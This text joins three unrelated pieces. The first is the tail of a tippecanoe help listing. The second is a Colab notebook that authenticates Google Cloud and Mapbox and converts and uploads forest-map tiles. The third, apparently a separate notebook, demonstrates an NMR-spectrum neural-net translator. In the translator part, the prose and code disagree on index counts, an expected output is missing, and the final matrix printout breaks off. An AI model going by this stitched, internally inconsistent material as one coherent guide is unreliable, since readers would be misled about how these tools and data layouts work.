Dropping tightly overlapping features
[--gamma=...] [--increase-gamma-as-needed]
Line and polygon simplification
[--simplification=...] [--no-line-simplification]
[--simplify-only-low-zooms] [--no-tiny-polygon-reduction]
[--no-simplification-of-shared-nodes]
Attempts to improve shared polygon boundaries
[--detect-shared-borders] [--grid-low-zooms]
Controlling clipping to tile boundaries
[--buffer=...] [--no-clipping] [--no-duplication]
Reordering features within each tile
[--preserve-input-order] [--reorder] [--coalesce]
[--reverse] [--hilbert]
Adding calculated attributes
[--calculate-feature-density] [--generate-ids]
Trying to correct bad source geometry
[--detect-longitude-wraparound] [--use-source-polygon-winding]
[--reverse-source-polygon-winding] [--clip-bounding-box=...]
Filtering tile contents
[--prefilter=...] [--postfilter=...]
Setting or disabling tile size limits
[--maximum-tile-bytes=...] [--maximum-tile-features=...]
[--no-feature-limit] [--no-tile-size-limit]
[--no-tile-compression] [--no-tile-stats]
[--tile-stats-attributes-limit=...]
[--tile-stats-sample-values-limit=...] [--tile-stats-values-limit=...]
Temporary storage
[--temporary-directory=...]
Progress indicator
[--quiet] [--no-progress-indicator] [--progress-interval=...]
[--version]
###Markdown
Python packages
###Code
%%bash
# Install mapbox python package
pip install mapbox
!pip list
###Output
Package Version
------------------------ ---------------
absl-py 0.9.0
alabaster 0.7.12
albumentations 0.1.12
altair 4.1.0
asgiref 3.2.7
astor 0.8.1
astropy 4.0.1.post1
astunparse 1.6.3
atari-py 0.2.6
atomicwrites 1.3.0
attrs 19.3.0
audioread 2.1.8
autograd 1.3
awscli 1.14.44
Babel 2.8.0
backcall 0.1.0
beautifulsoup4 4.6.3
bleach 3.1.4
blis 0.4.1
bokeh 1.4.0
boto 2.49.0
boto3 1.12.39
botocore 1.15.39
Bottleneck 1.3.2
branca 0.4.0
bs4 0.0.1
CacheControl 0.12.6
cachetools 3.1.1
catalogue 1.0.0
certifi 2020.4.5.1
cffi 1.14.0
chainer 6.5.0
chardet 3.0.4
click 7.1.1
cloudpickle 1.3.0
cmake 3.12.0
cmdstanpy 0.4.0
colorama 0.3.7
colorlover 0.3.0
community 1.0.0b1
contextlib2 0.5.5
convertdate 2.2.0
coverage 3.7.1
coveralls 0.5
crcmod 1.7
cufflinks 0.17.3
cvxopt 1.2.4
cvxpy 1.0.31
cycler 0.10.0
cymem 2.0.3
Cython 0.29.16
daft 0.0.4
dask 2.12.0
dataclasses 0.7
datascience 0.10.6
decorator 4.4.2
defusedxml 0.6.0
descartes 1.1.0
dill 0.3.1.1
distributed 1.25.3
Django 3.0.5
dlib 19.18.0
docopt 0.6.2
docutils 0.15.2
dopamine-rl 1.0.5
earthengine-api 0.1.217
easydict 1.9
ecos 2.0.7.post1
editdistance 0.5.3
en-core-web-sm 2.2.5
entrypoints 0.3
ephem 3.7.7.1
et-xmlfile 1.0.1
fa2 0.3.5
fancyimpute 0.4.3
fastai 1.0.60
fastdtw 0.3.4
fastprogress 0.2.3
fastrlock 0.4
fbprophet 0.6
feather-format 0.4.0
featuretools 0.4.1
filelock 3.0.12
firebase-admin 4.0.1
fix-yahoo-finance 0.0.22
Flask 1.1.2
folium 0.8.3
fsspec 0.7.2
future 0.16.0
gast 0.3.3
GDAL 2.2.2
gdown 3.6.4
gensim 3.6.0
geographiclib 1.50
geopy 1.17.0
gin-config 0.3.0
glob2 0.7
google 2.0.3
google-api-core 1.16.0
google-api-python-client 1.7.12
google-auth 1.7.2
google-auth-httplib2 0.0.3
google-auth-oauthlib 0.4.1
google-cloud-bigquery 1.21.0
google-cloud-core 1.0.3
google-cloud-datastore 1.8.0
google-cloud-firestore 1.6.2
google-cloud-language 1.2.0
google-cloud-storage 1.18.1
google-cloud-translate 1.5.0
google-colab 1.0.0
google-pasta 0.2.0
google-resumable-media 0.4.1
googleapis-common-protos 1.51.0
googledrivedownloader 0.4
graphviz 0.10.1
grpcio 1.28.1
gspread 3.0.1
gspread-dataframe 3.0.5
gym 0.17.1
h5py 2.10.0
HeapDict 1.0.1
holidays 0.9.12
html5lib 1.0.1
httpimport 0.5.18
httplib2 0.17.2
httplib2shim 0.0.3
humanize 0.5.1
hyperopt 0.1.2
ideep4py 2.0.0.post3
idna 2.8
image 1.5.30
imageio 2.4.1
imagesize 1.2.0
imbalanced-learn 0.4.3
imblearn 0.0
imgaug 0.2.9
importlib-metadata 1.6.0
imutils 0.5.3
inflect 2.1.0
intel-openmp 2020.0.133
intervaltree 2.1.0
ipykernel 4.10.1
ipython 5.5.0
ipython-genutils 0.2.0
ipython-sql 0.3.9
ipywidgets 7.5.1
iso3166 1.0.1
itsdangerous 1.1.0
jax 0.1.62
jaxlib 0.1.42
jdcal 1.4.1
jedi 0.17.0
jieba 0.42.1
Jinja2 2.11.2
jmespath 0.9.5
joblib 0.14.1
jpeg4py 0.1.4
jsonschema 2.6.0
jupyter 1.0.0
jupyter-client 5.3.4
jupyter-console 5.2.0
jupyter-core 4.6.3
kaggle 1.5.6
kapre 0.1.3.1
Keras 2.3.1
Keras-Applications 1.0.8
Keras-Preprocessing 1.1.0
keras-vis 0.4.1
kiwisolver 1.2.0
knnimpute 0.1.0
librosa 0.6.3
lightgbm 2.2.3
llvmlite 0.31.0
lmdb 0.98
lucid 0.3.8
LunarCalendar 0.0.9
lxml 4.2.6
mapbox 0.18.0
Markdown 3.2.1
MarkupSafe 1.1.1
matplotlib 3.2.1
matplotlib-venn 0.11.5
missingno 0.4.2
mistune 0.8.4
mizani 0.6.0
mkl 2019.0
mlxtend 0.14.0
more-itertools 8.2.0
moviepy 0.2.3.5
mpmath 1.1.0
msgpack 1.0.0
multiprocess 0.70.9
multitasking 0.0.9
murmurhash 1.0.2
music21 5.5.0
natsort 5.5.0
nbconvert 5.6.1
nbformat 5.0.5
networkx 2.4
nibabel 3.0.2
nltk 3.2.5
notebook 5.2.2
np-utils 0.5.12.1
numba 0.48.0
numexpr 2.7.1
numpy 1.18.2
nvidia-ml-py3 7.352.0
oauth2client 4.1.3
oauthlib 3.1.0
okgrade 0.4.3
opencv-contrib-python 4.1.2.30
opencv-python 4.1.2.30
openpyxl 2.5.9
opt-einsum 3.2.0
osqp 0.6.1
packaging 20.3
palettable 3.3.0
pandas 1.0.3
pandas-datareader 0.8.1
pandas-gbq 0.11.0
pandas-profiling 1.4.1
pandocfilters 1.4.2
parso 0.7.0
pathlib 1.0.1
patsy 0.5.1
pexpect 4.8.0
pickleshare 0.7.5
Pillow 7.0.0
pip 19.3.1
pip-tools 4.5.1
plac 1.1.3
plotly 4.4.1
plotnine 0.6.0
pluggy 0.7.1
polyline 1.4.0
portpicker 1.3.1
prefetch-generator 1.0.1
preshed 3.0.2
prettytable 0.7.2
progressbar2 3.38.0
prometheus-client 0.7.1
promise 2.3
prompt-toolkit 1.0.18
protobuf 3.10.0
psutil 5.4.8
psycopg2 2.7.6.1
ptvsd 5.0.0a12
ptyprocess 0.6.0
py 1.8.1
pyarrow 0.14.1
pyasn1 0.4.8
pyasn1-modules 0.2.8
pycocotools 2.0.0
pycparser 2.20
pydata-google-auth 0.3.0
pydot 1.3.0
pydot-ng 2.0.0
pydotplus 2.0.2
PyDrive 1.3.1
pyemd 0.5.1
pyglet 1.5.0
Pygments 2.1.3
pygobject 3.26.1
pymc3 3.7
PyMeeus 0.3.7
pymongo 3.10.1
pymystem3 0.2.0
PyOpenGL 3.1.5
pyparsing 2.4.7
pyrsistent 0.16.0
pysndfile 1.3.8
PySocks 1.7.1
pystan 2.19.1.1
pytest 3.6.4
python-apt 1.6.5+ubuntu0.2
python-chess 0.23.11
python-dateutil 2.8.1
python-louvain 0.14
python-slugify 4.0.0
python-utils 2.4.0
pytz 2018.9
PyWavelets 1.1.1
PyYAML 3.13
pyzmq 19.0.0
qtconsole 4.7.2
QtPy 1.9.0
regex 2019.12.20
requests 2.21.0
requests-oauthlib 1.3.0
resampy 0.2.2
retrying 1.3.3
roman 2.0.0
rpy2 3.2.7
rsa 4.0
s3fs 0.4.2
s3transfer 0.3.3
scikit-image 0.16.2
scikit-learn 0.22.2.post1
scipy 1.4.1
screen-resolution-extra 0.0.0
scs 2.1.2
seaborn 0.10.0
Send2Trash 1.5.0
setuptools 46.1.3
setuptools-git 1.2
Shapely 1.7.0
simplegeneric 0.8.1
six 1.12.0
sklearn 0.0
sklearn-pandas 1.8.0
smart-open 1.11.1
snowballstemmer 2.0.0
sortedcontainers 2.1.0
spacy 2.2.4
Sphinx 1.8.5
sphinxcontrib-websupport 1.2.1
SQLAlchemy 1.3.16
sqlparse 0.3.1
srsly 1.0.2
statsmodels 0.10.2
sympy 1.1.1
tables 3.4.4
tabulate 0.8.7
tbb 2020.0.133
tblib 1.6.0
tensorboard 2.2.0
tensorboard-plugin-wit 1.6.0.post3
tensorboardcolab 0.0.22
tensorflow 2.2.0rc3
tensorflow-addons 0.8.3
tensorflow-datasets 2.1.0
tensorflow-estimator 2.2.0rc0
tensorflow-gcs-config 2.1.8
tensorflow-hub 0.8.0
tensorflow-metadata 0.21.2
tensorflow-privacy 0.2.2
tensorflow-probability 0.9.0
termcolor 1.1.0
terminado 0.8.3
testpath 0.4.4
text-unidecode 1.3
textblob 0.15.3
textgenrnn 1.4.1
Theano 1.0.4
thinc 7.4.0
toolz 0.10.0
torch 1.4.0
torchsummary 1.5.1
torchtext 0.3.1
torchvision 0.5.0
tornado 4.5.3
tqdm 4.38.0
traitlets 4.3.3
tweepy 3.6.0
typeguard 2.7.1
typing 3.6.6
typing-extensions 3.6.6
tzlocal 1.5.1
umap-learn 0.4.1
uritemplate 3.0.1
urllib3 1.24.3
vega-datasets 0.8.0
wasabi 0.6.0
wcwidth 0.1.9
webencodings 0.5.1
Werkzeug 1.0.1
wheel 0.34.2
widgetsnbextension 3.5.1
wordcloud 1.5.0
wrapt 1.12.1
xarray 0.15.1
xgboost 0.90
xkit 0.0.0
xlrd 1.1.0
xlwt 1.3.0
yellowbrick 0.9.1
zict 2.0.0
zipp 3.1.0
###Markdown
Authorisation Google cloud storageEither use user authorisation or a service account, save credentials to your drive or upload.
###Code
# For auth WITHOUT service account
#from google.colab import auth
#auth.authenticate_user()
# https://cloud.google.com/resource-manager/docs/creating-managing-projects
#project_id = "soc-platform"
#!gcloud config set project {project_id}
# Mount drive
from google.colab import drive
drive.mount('/content/drive')
# Copy GC credentials to home (place in your GDrive, and connect Drive)
!cp "/content/drive/My Drive/soc-platform-6a9bf204638c.json" "/root/.soc-platform-6a9bf204638c.json"
# Auth WITH service account
!gcloud auth activate-service-account \
[email protected] \
--key-file=/root/.soc-platform-6a9bf204638c.json --project="soc-platform"
# Test GC auth
!gsutil ls "gs://vizz-data-transfer"
###Output
gs://vizz-data-transfer/SOC_maps/
###Markdown
MapBoxCreate a JSON file and add it to your drive or upload:```{"MB_USER": "user-name", "MB_TOKEN": "token"}```
###Code
# Copy GC credentials to home (place in your GDrive, and connect Drive)
!cp "/content/drive/My Drive/copernicus-forests-mapbox.json" "/root/.copernicus-forests-mapbox.json"
# Set up Mapbox (S3) credentials as environmental variables
import json
import os
# Set user and token as environment variables
c = json.loads(open("/root/.copernicus-forests-mapbox.json").read())
os.environ['MB_USER'] = c['MB_USER']
os.environ['MB_TOKEN'] = c['MB_TOKEN']
# Make call to mapbox api and save return to file
!curl -X POST https://api.mapbox.com/uploads/v1/${MB_USER}/credentials?access_token=${MB_TOKEN} > credentials.json
r = json.loads(open("credentials.json").read())
#print(r)
# Set credentials as environ variables
os.environ['MB_BUCKET'] = r['bucket']
os.environ['MB_KEY'] = r['key']
os.environ['AWS_ACCESS_KEY_ID'] = r['accessKeyId']
os.environ['AWS_SECRET_ACCESS_KEY'] = r['secretAccessKey']
os.environ['AWS_SESSION_TOKEN'] = r['sessionToken']
###Output
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 857 100 857 0 0 2158 0 --:--:-- --:--:-- --:--:-- 2158
###Markdown
Utils copy_gcs
###Code
import os
import subprocess
def copy_gcs(source_list, dest_list, opts=""):
"""
Use gsutil to copy each corresponding item in source_list
to dest_list
"""
for s, d in zip(source_list, dest_list):
cmd = f"gsutil -m cp -r {opts} {s} {d}"
print(f"Processing: {cmd}")
r = subprocess.call(cmd, shell=True)
if r == 0:
print("Task created")
else:
print("Task failed")
print("Finished copy")
###Output
_____no_output_____
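###Markdown
A usage sketch for `copy_gcs` (for illustration; the destination prefix is an assumption, adjust it to wherever the tiles should live):
###Code
# Hypothetical example: push a generated MBTILES file back to the transfer bucket
copy_gcs(
    ["'/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles'"],
    ["gs://vizz-data-transfer/SOC_maps/"]
)
###Output
_____no_output_____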
###Markdown
upload_to_mapbox
###Code
# Upload task for mapbox
import os
from mapbox import Uploader
def upload_to_mapbox(file_path, tileset_name):
"""
Given a local file path and a MapBox tileset name
push to MapBox AWS S3 staging and create MapBox upload task
"""
username = os.getenv("MB_USER")
my_token = os.getenv("MB_TOKEN")
u = Uploader(access_token=my_token) # handles authentication
tileset = f"{username}.{tileset_name}" # name your tileset
job = u.upload(open(file_path, 'rb'), tileset) # upload happens here
# job = u.create(url, tileset, name=tileset_name) # starts the tiling job
status = job.status_code
print(status)
###Output
_____no_output_____
###Markdown
create_mbtiles
###Code
import os
import subprocess
def create_mbtiles(source_path, dest_path, layer_name, opts="-zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel"):
"""
Use tippecanoe to to create a MBTILE at dest_path from source_path.
layer_name is used for the name of the layer in the MBTILE.
Regex file path (/*.geojson) is supported for source_path.
"""
cmd = f"tippecanoe -o {dest_path} -l {layer_name} {opts} {source_path}"
print(f"Processing: {cmd}")
r = subprocess.call(cmd, shell=True)
if r == 0:
print("Task created")
else:
print("Task failed")
print("Finished processing")
###Output
_____no_output_____
###Markdown
Process data Create MBTILES
###Code
layer_name = "SWE_biovar_species"
source_path = "'/content/drive/My Drive/copernicus-forests/SWE_zonal_biovar_ISEA-3-HEXAGON_grid.geojson'"
dest_path = "'/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles'"
create_mbtiles(source_path, dest_path, layer_name, opts="-zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel")
###Output
Processing: tippecanoe -o '/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles' -l SWE_biovar_species -zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel '/content/drive/My Drive/copernicus-forests/SWE_zonal_biovar_ISEA-3-HEXAGON_grid.geojson'
Task created
Finished processing
###Markdown
Upload to MapBox
###Code
# Add to Mapbox
import glob
import os
path = '/content/drive/My Drive/copernicus-forests/'
files = [f for f in glob.glob(path + "**/*.mbtiles", recursive=True)]
print(files)
for f in files:
print(f)
upload_to_mapbox(f, os.path.splitext(os.path.basename(f))[0])
###Output
['/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles']
/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles
201
|
examples/TranslatorExample.ipynb | ###Markdown
SSPINN Neural Net Translator Let's take a look at our nn_translator function. This function takes the input file and parses it to get a tuple containing: 1. a list of elements of size 10 concatenated with a list of peak areas and multiplicities of size 3,340 2. a connectivity matrix of size 432 by 432. So first we will import the nn_translator from sspinn. We also import os so that we can look at the input files:
###Code
from sspinn.nn_translator import nn_translator as nnt
import os
###Output
_____no_output_____
###Markdown
This is what the input file for C15O2H22 would look like for a training file:
###Code
fo = open('nn_translator_test.txt', 'r')
line = fo.readline()
print(line)
while line != '':
line = fo.readline()
print(line)
###Output
Empirical formula: C15O2H22
peakLocation peakArea peakMultiplicity
9.1 1 Q
10.9 1 Q
24.2 1 Q
26.6 1 q
27.4 1 T
33.0 1 t
39.0 1 T
44.1 1 S
46.2 1 D
72.7 1 d
121.6 1 D
125.6 1 S
138.1 1 s
165.9 1 s
200.1 1 S
Connectivity Matrix
C C C C C C C C C C C C C C C O O H H H H H H H H H H H H H H H H H H H H H H
0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 1 0 0 1 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
1 0 0 0 0 2 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 1 0 0 1 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 2 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 1 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 1 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 1 2 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0
0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0
0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0
0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0
2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1
0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
###Markdown
The input file starts out with the empirical formula, followed by a list of the peak location, peak area, and peak multiplicity. Since we are using C-NMR, all of the peak areas should be set to 1. If the input file is not a training file, then it will end after this list. If the input file is a training file, then it will also include a connectivity matrix at the end. To run the file through the nn_translator we use the following function, which takes 2 arguments: 1. The path to the input file (string) 2. Whether or not this is a training file (boolean, default=True)
###Code
output = nnt('nn_translator_test.txt', True)
###Output
_____no_output_____
###Markdown
This function will output a tuple with two elements. We check the size of each element and make sure they are the expected sizes (3350 and 432 by 432):
###Code
len(output[0])
print(len(output[1]), 'by', len(output[1][0]))
###Output
432 by 432
###Markdown
The chemical elements are encoded in the first 11 entries of `output[0]`:
###Code
output[0][0:10]
###Output
_____no_output_____
###Markdown
The rest of `output[0]` contains the multiplicities of peaks at locations that correspond to their index number (there is no peak at 9.0, so there will be a zero at `index = 90+11`, but there is a quartet at 9.1, so we will see a 4 at `index = 91+11`):
###Code
output[0][90+11:110]
###Output
_____no_output_____
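###Markdown
To spell the indexing out for a single peak (an illustrative check that follows the `91+11` arithmetic above):
###Code
# The quartet reported at 9.1 ppm should appear as a 4 at index 91 + 11
output[0][int(round(9.1 * 10)) + 11]
###Output
_____no_output_____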
###Markdown
The elements of the connectivity matrix that are included in the input file are expanded into a connectivity matrix of size 432 by 432, where the first 182 rows represent the connections to hydrogens, the next 144 rows contain the carbon connections, and so on with N, O, S, F, Cl, Br, P, I, and B. Since hydrogen cannot bond with hydrogen, if we look at the first row, we will see that the first 22 elements (looking just at the columns related to the number of hydrogens in our system, for the sake of looking at a reasonably sized matrix) will be zero:
###Code
for i in range(0,22):
print(output[1][i][0:22])
###Output
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
###Markdown
We can look at the carbon hydrogen bonds by looking at the block for elements (i,j) where i runs from 0 to 22 and j runs from 183 to 198:
###Code
for i in range(0,22):
print(output[1][i][183:198])
###Output
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
###Markdown
However, if we look at the carbon carbon block (for the first 15 carbons, since those are the ones involved in bonding) we will see single and double bonds:
###Code
for i in range(183, 198):
print(output[1][i][183:198])
###Output
[0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0]
[1, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0]
[0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0]
[0, 0, 0, 2, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0]
